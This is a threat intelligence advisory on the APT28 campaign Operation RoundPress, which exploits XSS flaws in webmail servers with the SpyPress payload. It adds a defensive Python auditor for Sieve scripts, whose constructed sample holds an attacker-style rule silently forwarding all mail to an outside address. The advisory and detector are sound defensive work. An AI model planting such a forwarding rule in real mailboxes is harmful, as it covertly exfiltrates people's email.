Current Cyber Threats

Operation RoundPress

Dylan Roth created a resource within a category you are watching at GTIA ISAO.

INFORMATIONAL - Severity: Medium - TLP:GREEN - Operation RoundPress

Summary:
Operation RoundPress is a cyber espionage campaign that ESET attributes with medium confidence to the Russia-linked threat actor APT28 (also known as Fancy Bear). Active since 2023, the operation targets webmail servers including Roundcube, Horde, MDaemon, and Zimbra by exploiting cross-site scripting (XSS) vulnerabilities, among them a flaw in MDaemon (CVE-2024-11182) that was a zero-day at the time it was used. The objective is to steal confidential data from specific email accounts; most victims are governmental entities and defense companies in Eastern Europe, although targets in Africa, Europe, and South America have also been observed. The initial access vector is a spear-phishing email carrying malicious HTML that, when the message is opened in a vulnerable webmail instance in the victim's browser, executes an obfuscated JavaScript payload named SpyPress. Running inside the victim's authenticated webmail session, SpyPress can steal credentials, harvest emails and contacts, and, in some SpyPress.ROUNDCUBE instances, create Sieve rules that forward all incoming emails to an attacker-controlled address. Collected data is exfiltrated via HTTP POST requests to a command-and-control server. Some variants also capture login history and 2FA codes, and create application passwords to retain access after the session ends.
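The Sieve-rule persistence described above is straightforward to audit from the server side. The following is an added example, not ESET's or GTIA ISAO's code: a Python script that scans Sieve scripts for `redirect` actions to addresses outside your own domains, flagging unconditional (`if true`) rules and `:copy` forwards, which leave the original message in the inbox so the victim sees nothing unusual. It assumes a Dovecot/Roundcube managesieve layout in which each user's scripts are stored as `*.sieve` files under the mail home and Roundcube writes a `# rule:[name]` comment before each rule; the sample script embedded in it is constructed for illustration and is not from the report.

```python
"""Audit Sieve scripts for forwarding rules that redirect a mailbox to an
external address (the persistence mechanism attributed to SpyPress.ROUNDCUBE).

Added example, not ESET's or GTIA ISAO's code. Assumes Dovecot/Roundcube
managesieve conventions: per-user *.sieve files under the mail home and a
`# rule:[name]` comment before each Roundcube-generated rule.
"""
import re
import sys
from dataclasses import dataclass
from pathlib import Path
from typing import Iterable, List, Optional

RULE_RE = re.compile(r'^#\s*rule:\[(.*)\]\s*$')            # Roundcube rule header comment
IF_RE = re.compile(r'^\s*(?:if|elsif)\s+(.*?)\s*\{?\s*$')   # test text; trailing '{' optional
ELSE_RE = re.compile(r'^\s*else\b')
REDIRECT_RE = re.compile(r'\bredirect\b((?:\s+:[a-z]+)*)\s+"([^"]+)"', re.IGNORECASE)
UNCONDITIONAL_RE = re.compile(r'(?:allof|anyof)\s*\(\s*true\s*\)|true')


@dataclass
class Finding:
    path: str
    line: int
    rule: Optional[str]
    address: str
    copy: bool           # `redirect :copy` keeps the original in the inbox, so the victim notices nothing
    unconditional: bool  # enclosing test is `true` (or top level): every incoming message is forwarded


def strip_comment(line: str) -> str:
    """Drop a trailing '#' comment, but not a '#' that sits inside a quoted string."""
    in_string = False
    i = 0
    while i < len(line):
        c = line[i]
        if c == '\\' and in_string:      # skip escaped character inside a string
            i += 2
            continue
        if c == '"':
            in_string = not in_string
        elif c == '#' and not in_string:
            return line[:i]
        i += 1
    return line


def audit_sieve(script: str, path: str = "<inline>", trusted_domains: Iterable[str] = ()) -> List[Finding]:
    """Return every redirect to a domain not in trusted_domains, with context."""
    trusted = {d.lower() for d in trusted_domains}
    findings: List[Finding] = []
    script = re.sub(r'/\*.*?\*/', '', script, flags=re.S)  # remove bracketed comments
    rule = None
    test = None      # text of the enclosing if/elsif test; None at top level
    depth = 0
    for lineno, raw in enumerate(script.splitlines(), 1):
        m = RULE_RE.match(raw.strip())
        if m:
            rule = m.group(1)
            continue
        line = strip_comment(raw)
        if ELSE_RE.match(line):
            test = "else"
        else:
            m = IF_RE.match(line)
            if m:
                test = m.group(1)
        for m in REDIRECT_RE.finditer(line):
            address = m.group(2)
            domain = address.rpartition('@')[2].lower()
            if domain in trusted:
                continue
            findings.append(Finding(
                path=path, line=lineno, rule=rule, address=address,
                copy=':copy' in m.group(1).lower(),
                unconditional=test is None or bool(UNCONDITIONAL_RE.fullmatch(test.strip())),
            ))
        # Brace tracking is heuristic (braces inside strings would miscount); fine for generated scripts.
        depth += line.count('{') - line.count('}')
        if depth <= 0 and '}' in line:
            test, depth = None, 0
    return findings


def audit_tree(root: str, trusted_domains: Iterable[str] = ()) -> List[Finding]:
    """Walk a mail home (e.g. /var/vmail) and audit every *.sieve script found."""
    out: List[Finding] = []
    for p in Path(root).rglob('*.sieve'):
        if p.is_file():
            out.extend(audit_sieve(p.read_text(errors='replace'), str(p), trusted_domains))
    return out


# Constructed sample in Roundcube managesieve style; the second rule is the attacker-style forward.
SAMPLE_SCRIPT = """\
require ["fileinto", "copy"];
# rule:[Finance]
if header :contains "subject" "invoice"
{
	fileinto "Finance";
}
# rule:[roundcube]
if true
{
	redirect :copy "collector@example.net";
}
# rule:[Keep]
if address :is "from" "boss@example.org"
{
	redirect "me@example.org";
}
"""

if __name__ == "__main__":
    # usage: python3 sieve_audit.py /var/vmail example.org [more trusted domains...]
    if len(sys.argv) > 1:
        results = audit_tree(sys.argv[1], trusted_domains=sys.argv[2:])
    else:
        results = audit_sieve(SAMPLE_SCRIPT, "sample.sieve", trusted_domains=("example.org",))
    for f in results:
        flags = ("copy " if f.copy else "") + ("ALL-MAIL" if f.unconditional else "conditional")
        print(f"{f.path}:{f.line} rule={f.rule!r} redirect -> {f.address} [{flags}]")
```

Run it against the mail home with your own domains as trusted, and treat any unconditional `:copy` redirect to an outside domain as a likely compromise; a forward created by the attacker survives a password reset, so the rule has to be removed on the server, not just the credential rotated.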

Security Officer Comments:
The disclosure of Operation RoundPress underscores the persistent threat posed by state-sponsored actors like APT28 and their multi-year focus on exploiting vulnerabilities in widely used webmail servers for espionage. The 2024 targeting of governmental and defense organizations, particularly those supporting Ukraine's war effort, aligns with the known geopolitical interests of this group. The exploitation of both known and zero-day XSS vulnerabilities across several webmail products demonstrates a resourceful and adaptable approach. Spear-phishing emails carrying malicious JavaScript require the recipient to open the message, yet remain an effective initial access vector, especially where known vulnerabilities go unpatched; once the vulnerable webmail client renders the HTML, the payload executes with the victim's session and no further interaction is needed. SpyPress's capabilities, including credential theft, data harvesting, and long-term access mechanisms such as Sieve forwarding rules and application passwords that sidestep 2FA, make significant data compromise and prolonged unauthorized access likely. Because Sieve rules and application passwords live on the server, they survive a password reset; incident response should therefore include reviewing affected users' Sieve scripts and revoking application passwords, not only patching and credential rotation. That other threat actors have recently targeted webmail platforms suggests these systems are increasingly viewed as high-value targets because patching is often delayed and they hold sensitive information. Organizations running these webmail servers must prioritize timely patching, implement robust email security measures, and educate users about the risks of interacting with unsolicited emails to mitigate campaigns like Operation RoundPress.

Suggested Corrections:
IOCs are available here.

Organizations can make APT groups’ lives more difficult. Here’s how:
  • Defense-in-depth strategy: A comprehensive defense-in-depth strategy is crucial to combat APTs. This includes implementing multiple layers of security controls, such as strong perimeter defenses, network segmentation, endpoint protection, intrusion detection systems, data encryption, access controls, and continuous monitoring for anomalies.
  • Threat intelligence and sharing: Ideally, organizations should actively participate in threat intelligence sharing communities and collaborate with industry peers, government agencies, and security vendors. Sharing information about APTs and their techniques can help detect and mitigate attacks more effectively.
  • Employee education and awareness: Regular security awareness programs, phishing simulations, and training sessions can educate employees about the latest threats, social engineering techniques, and safe computing practices.
  • Incident response and recovery: Regardless of preventive measures, organizations should have a well-defined incident response plan. This includes incident detection, containment, eradication, and recovery procedures to minimize the impact of APT attacks and restore normal operations.
Link(s):
https://www.welivesecurity.com/en/eset-research/operation-roundpress/

This message was sent to you because you opted to watch the category "Threat Intelligence" at GTIA ISAO with email notification of new resources or updates.